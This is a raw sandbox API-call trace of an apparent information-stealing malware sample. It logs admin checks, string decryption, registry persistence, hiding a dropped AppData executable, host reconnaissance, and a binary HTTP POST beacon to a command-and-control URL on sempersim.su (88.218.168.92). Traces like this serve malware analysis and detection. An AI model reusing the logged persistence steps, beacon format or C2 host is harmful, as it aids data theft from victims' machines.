[0320.190] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fcfc, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fd04 | out: pSid=0x19fd04*=0x79eb10*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0320.190] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.190] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x79eb10*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fd08 | out: IsMember=0x19fd08) returned 1 [0320.191] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.192] GetProcessHeap () returned 0x780000 [0320.192] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x60) returned 0x7a2838 [0320.192] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.193] CryptAcquireContextW (in: phProv=0x19fc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fc94*=0x0) returned 1 [0320.198] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.199] CryptAcquireContextW (in: phProv=0x19fc94, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fc94*=0x79cab8) returned 1 [0320.206] GetProcessHeap () returned 0x780000 [0320.206] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x24) returned 0x798a20 [0320.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.207] CryptImportKey (in: hProv=0x79cab8, pbData=0x798a20, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fc98 | out: phKey=0x19fc98*=0x78d6c8) returned 1 [0320.208] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.208] CryptSetKeyParam (hKey=0x78d6c8, dwParam=0x4, pbData=0x19fc90*=0x1, dwFlags=0x0) returned 1 [0320.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.209] CryptSetKeyParam (hKey=0x78d6c8, dwParam=0x1, pbData=0x418844, dwFlags=0x0) returned 1 [0320.209] GetProcessHeap () returned 0x780000 [0320.210] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798a20 | out: hHeap=0x780000) returned 1 [0320.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.210] CryptDecrypt (in: hKey=0x78d6c8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7a2838, pdwDataLen=0x19fce8 | out: pbData=0x7a2838, pdwDataLen=0x19fce8) returned 1 [0320.211] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.211] CryptDestroyKey (hKey=0x78d6c8) returned 1 [0320.212] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.212] CryptReleaseContext (hProv=0x79cab8, dwFlags=0x0) returned 1 [0320.213] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x7a2838, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0320.213] GetProcessHeap () returned 0x780000 [0320.213] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x36) returned 0x78d6c8 [0320.263] MultiByteToWideChar (in: CodePage=0xfde9, dwFlags=0x0, lpMultiByteStr=0x7a2838, cbMultiByte=-1, lpWideCharStr=0x78d6c8, cchWideChar=27 | out: lpWideCharStr="������Ќ��������ь�И��Й��я��") returned 27 [0320.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.264] SHRegSetPathW (hKey=0x80000002, pcszSubKey="������Ќ��������ь�И��Й��я��", pcszValue="9EDDE9", pcszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFlags=0x0) returned 0x57 [0320.266] GetProcessHeap () returned 0x780000 [0320.266] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x78d6c8 | out: hHeap=0x780000) returned 1 [0320.266] GetProcessHeap () returned 0x780000 [0320.267] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2838 | out: hHeap=0x780000) returned 1 [0320.267] GetProcessHeap () returned 0x780000 [0320.267] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797190 | out: hHeap=0x780000) returned 1 [0320.268] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9\\9BDC8A.exe", dwFileAttributes=0x2006) returned 1 [0320.270] SetFileAttributesW (lpFileName="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\9EDDE9", dwFileAttributes=0x2006) returned 1 [0320.270] GetProcessHeap () returned 0x780000 [0320.270] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79d780 | out: hHeap=0x780000) returned 1 [0320.270] GetProcessHeap () returned 0x780000 [0320.271] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x797710 | out: hHeap=0x780000) returned 1 [0320.271] GetProcessHeap () returned 0x780000 [0320.271] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2628 | out: hHeap=0x780000) returned 1 [0320.271] GetProcessHeap () returned 0x780000 [0320.271] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x2bc) returned 0x7a2050 [0320.271] GetProcessHeap () returned 0x780000 [0320.271] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xc) returned 0x79eb40 [0320.271] GetProcessHeap () returned 0x780000 [0320.271] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x11c) returned 0x79a550 [0320.272] RtlGetVersion (in: lpVersionInformation=0x79a550 | out: lpVersionInformation=0x79a550*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 0x0 [0320.272] GetProcessHeap () returned 0x780000 [0320.273] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a550 | out: hHeap=0x780000) returned 1 [0320.273] GetProcessHeap () returned 0x780000 [0320.273] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x7a2318 [0320.273] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.274] GetUserNameW (in: lpBuffer=0x7a2318, pcbBuffer=0x19fed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fed0) returned 1 [0320.274] GetProcessHeap () returned 0x780000 [0320.275] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2318 | out: hHeap=0x780000) returned 1 [0320.275] GetProcessHeap () returned 0x780000 [0320.275] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x7a2318 [0320.275] GetComputerNameW (in: lpBuffer=0x7a2318, nSize=0x19fed0 | out: lpBuffer="XC64ZB", nSize=0x19fed0) returned 1 [0320.275] GetProcessHeap () returned 0x780000 [0320.275] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2318 | out: hHeap=0x780000) returned 1 [0320.276] GetCurrentThread () returned 0xfffffffe [0320.277] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.278] OpenThreadToken (in: ThreadHandle=0xfffffffe, DesiredAccess=0x8, OpenAsSelf=1, TokenHandle=0x19fed0 | out: TokenHandle=0x19fed0*=0x0) returned 0 [0320.278] GetLastError () returned 0x3f0 [0320.278] GetCurrentProcess () returned 0xffffffff [0320.279] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.279] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fed0 | out: TokenHandle=0x19fed0*=0x254) returned 1 [0320.279] GetProcessHeap () returned 0x780000 [0320.279] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x7a2318 [0320.280] GetProcessHeap () returned 0x780000 [0320.280] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x208) returned 0x7a2628 [0320.280] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.281] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x19fecc | out: TokenInformation=0x0, ReturnLength=0x19fecc) returned 0 [0320.281] GetProcessHeap () returned 0x780000 [0320.281] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x24) returned 0x7987e0 [0320.281] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.282] GetTokenInformation (in: TokenHandle=0x254, TokenInformationClass=0x1, TokenInformation=0x7987e0, TokenInformationLength=0x24, ReturnLength=0x19fecc | out: TokenInformation=0x7987e0, ReturnLength=0x19fecc) returned 1 [0320.282] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.283] LookupAccountSidW (in: lpSystemName=0x0, Sid=0x7987e8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x65)), Name=0x7a2318, cchName=0x19febc, ReferencedDomainName=0x7a2628, cchReferencedDomainName=0x19fec0, peUse=0x19feb8 | out: Name="RDhJ0CNFevzX", cchName=0x19febc, ReferencedDomainName="XC64ZB", cchReferencedDomainName=0x19fec0, peUse=0x19feb8) returned 1 [0320.284] GetProcessHeap () returned 0x780000 [0320.284] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3f44) returned 0x7a43d0 [0320.285] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.286] wvsprintfW (in: param_1=0x7a43d0, param_2="%s", arglist=0x19fea8 | out: param_1="XC64ZB") returned 6 [0320.286] GetProcessHeap () returned 0x780000 [0320.286] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x10) returned 0x79eab0 [0320.286] GetProcessHeap () returned 0x780000 [0320.286] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0320.286] GetProcessHeap () returned 0x780000 [0320.286] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7987e0 | out: hHeap=0x780000) returned 1 [0320.287] CloseHandle (hObject=0x254) returned 1 [0320.287] GetProcessHeap () returned 0x780000 [0320.287] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2628 | out: hHeap=0x780000) returned 1 [0320.287] GetProcessHeap () returned 0x780000 [0320.287] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2318 | out: hHeap=0x780000) returned 1 [0320.287] GetProcessHeap () returned 0x780000 [0320.287] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79eab0 | out: hHeap=0x780000) returned 1 [0320.288] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.288] GetDesktopWindow () returned 0x10010 [0320.289] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.289] GetWindowRect (in: hWnd=0x10010, lpRect=0x19fec8 | out: lpRect=0x19fec8) returned 1 [0320.289] GetProcessHeap () returned 0x780000 [0320.289] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x8) returned 0x79b3c0 [0320.289] GetProcessHeap () returned 0x780000 [0320.289] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3c0 | out: hHeap=0x780000) returned 1 [0320.290] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.290] GetUserNameW (in: lpBuffer=0x19fcc8, pcbBuffer=0x19fed0 | out: lpBuffer="RDhJ0CNFevzX", pcbBuffer=0x19fed0) returned 1 [0320.340] LoadLibraryW (lpLibFileName="NETAPI32") returned 0x74d00000 [0320.341] GetProcAddress (hModule=0x74d00000, lpProcName="NetUserGetInfo") returned 0x744833a0 [0320.341] NetUserGetInfo (in: servername=0x0, username="RDhJ0CNFevzX", level=0x1, bufptr=0x19fed4 | out: bufptr=0x7a34a8*(usri1_name="RDhJ0CNFevzX", usri1_password=0x0, usri1_password_age=0xad908, usri1_priv=0x2, usri1_home_dir="", usri1_comment="", usri1_flags=0x10201, usri1_script_path="")) returned 0x0 [0320.346] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.346] AllocateAndInitializeSid (in: pIdentifierAuthority=0x19fec0, nSubAuthorityCount=0x2, nSubAuthority0=0x20, nSubAuthority1=0x220, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x19fec8 | out: pSid=0x19fec8*=0x79e8d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0))) returned 1 [0320.347] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.347] CheckTokenMembership (in: TokenHandle=0x0, SidToCheck=0x79e8d0*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x19fecc | out: IsMember=0x19fecc) returned 1 [0320.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.348] GetNativeSystemInfo (in: lpSystemInfo=0x19fea4 | out: lpSystemInfo=0x19fea4*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0320.349] GetProcessHeap () returned 0x780000 [0320.349] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x40) returned 0x7a2da0 [0320.349] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.349] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0320.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.386] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x79cab8) returned 1 [0320.392] GetProcessHeap () returned 0x780000 [0320.392] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x24) returned 0x798ae0 [0320.393] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.393] CryptImportKey (in: hProv=0x79cab8, pbData=0x798ae0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x78d408) returned 1 [0320.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.394] CryptSetKeyParam (hKey=0x78d408, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0320.394] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.395] CryptSetKeyParam (hKey=0x78d408, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0320.395] GetProcessHeap () returned 0x780000 [0320.395] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x798ae0 | out: hHeap=0x780000) returned 1 [0320.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.396] CryptDecrypt (in: hKey=0x78d408, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x7a2da0, pdwDataLen=0x19fcfc | out: pbData=0x7a2da0, pdwDataLen=0x19fcfc) returned 1 [0320.396] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.397] CryptDestroyKey (hKey=0x78d408) returned 1 [0320.397] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0320.397] CryptReleaseContext (hProv=0x79cab8, dwFlags=0x0) returned 1 [0320.398] GetProcessHeap () returned 0x780000 [0320.398] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x212) returned 0x7a2628 [0320.398] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.398] StrStrA (lpFirst="http://sempersim.su/gf3/fre.php", lpSrch="http://") returned="http://sempersim.su/gf3/fre.php" [0320.399] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.399] StrStrA (lpFirst="sempersim.su/gf3/fre.php", lpSrch="/") returned="/gf3/fre.php" [0320.400] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.400] StrStrA (lpFirst="sempersim.su/gf3/fre.php", lpSrch=":") returned 0x0 [0320.400] GetProcessHeap () returned 0x780000 [0320.400] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x20) returned 0x792fb8 [0320.400] getaddrinfo (in: pNodeName="sempersim.su", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x793288*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x79e8b8*(sa_family=2, sin_port=0x50, sin_addr="88.218.168.92"), ai_next=0x0)) returned 0 [0320.418] GetProcessHeap () returned 0x780000 [0320.418] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x4) returned 0x79b3a0 [0320.418] socket (af=2, type=1, protocol=6) returned 0x264 [0320.418] connect (s=0x264, name=0x79e8b8*(sa_family=2, sin_port=0x50, sin_addr="88.218.168.92"), namelen=16) returned 0 [0320.450] FreeAddrInfoW (pAddrInfo=0x793288*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x79e8b8*(sa_family=2, sin_port=0x50, sin_addr="88.218.168.92"), ai_next=0x0)) [0320.450] GetProcessHeap () returned 0x780000 [0320.450] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x7d) returned 0x79cab8 [0320.450] GetProcessHeap () returned 0x780000 [0320.450] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x201b) returned 0x7a43d0 [0320.451] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.451] wvsprintfA (in: param_1=0x7a43d0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /gf3/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 171 [0320.451] GetProcessHeap () returned 0x780000 [0320.451] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xad) returned 0x79a648 [0320.451] GetProcessHeap () returned 0x780000 [0320.452] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0320.452] GetProcessHeap () returned 0x780000 [0320.452] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x3e) returned 0x7a32f8 [0320.452] GetProcessHeap () returned 0x780000 [0320.452] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x1fdc) returned 0x7a43d0 [0320.453] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0320.453] wvsprintfA (in: param_1=0x7a43d0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /gf3/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: sempersim.su\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 1234DF8C\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 236 [0320.453] GetProcessHeap () returned 0x780000 [0320.453] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xee) returned 0x7a1ce8 [0320.453] GetProcessHeap () returned 0x780000 [0320.454] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a43d0 | out: hHeap=0x780000) returned 1 [0320.454] send (s=0x264, buf=0x7a1ce8*, len=236, flags=0) returned 236 [0320.455] send (s=0x264, buf=0x7a2050*, len=159, flags=0) returned 159 [0320.455] GetProcessHeap () returned 0x780000 [0320.455] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0xfd0) returned 0x79b520 [0320.455] recv (in: s=0x264, buf=0x79b520, len=4048, flags=0 | out: buf=0x79b520*) returned 237 [0320.894] GetProcessHeap () returned 0x780000 [0320.895] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a1ce8 | out: hHeap=0x780000) returned 1 [0320.895] GetProcessHeap () returned 0x780000 [0320.895] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a32f8 | out: hHeap=0x780000) returned 1 [0320.896] GetProcessHeap () returned 0x780000 [0320.897] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a648 | out: hHeap=0x780000) returned 1 [0320.898] GetProcessHeap () returned 0x780000 [0320.898] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79cab8 | out: hHeap=0x780000) returned 1 [0320.898] closesocket (s=0x264) returned 0 [0320.899] GetProcessHeap () returned 0x780000 [0320.899] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b3a0 | out: hHeap=0x780000) returned 1 [0320.899] GetProcessHeap () returned 0x780000 [0320.899] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2628 | out: hHeap=0x780000) returned 1 [0320.899] GetProcessHeap () returned 0x780000 [0320.900] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7a2da0 | out: hHeap=0x780000) returned 1 [0320.900] GetProcessHeap () returned 0x780000 [0320.900] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x792fb8 | out: hHeap=0x780000) returned 1 [0320.900] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x79b520, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0xb6c) returned 0x264 [0320.902] Sleep (dwMilliseconds=0xea60) Thread: id = 11 os_tid = 0x4ac Thread: id = 12 os_tid = 0xb6c [0320.918] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0320.921] StrStrA (lpFirst="HTTP/1.0 404 Not Found\r\nDate: Wed, 04 May 2022 15:24:09 GMT\r\nServer: Apache/2.4.6 (CentOS) PHP/5.4.16\r\nX-Powered-By: PHP/5.4.16\r\nStatus: 404 Not Found\r\nContent-Length: 23\r\nContent-Type: text/html; charset=UTF-8\r\n\r\n\x08", lpSrch="\r\n\r\n") returned="\r\n\r\n\x08" [0320.922] GetProcessHeap () returned 0x780000 [0320.922] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x0, Size=0x10) returned 0x79e8a0 [0320.922] GetProcessHeap () returned 0x780000 [0320.922] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79e8a0 | out: hHeap=0x780000) returned 1 [0320.922] GetProcessHeap () returned 0x780000 [0320.923] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79b520 | out: hHeap=0x780000) returned 1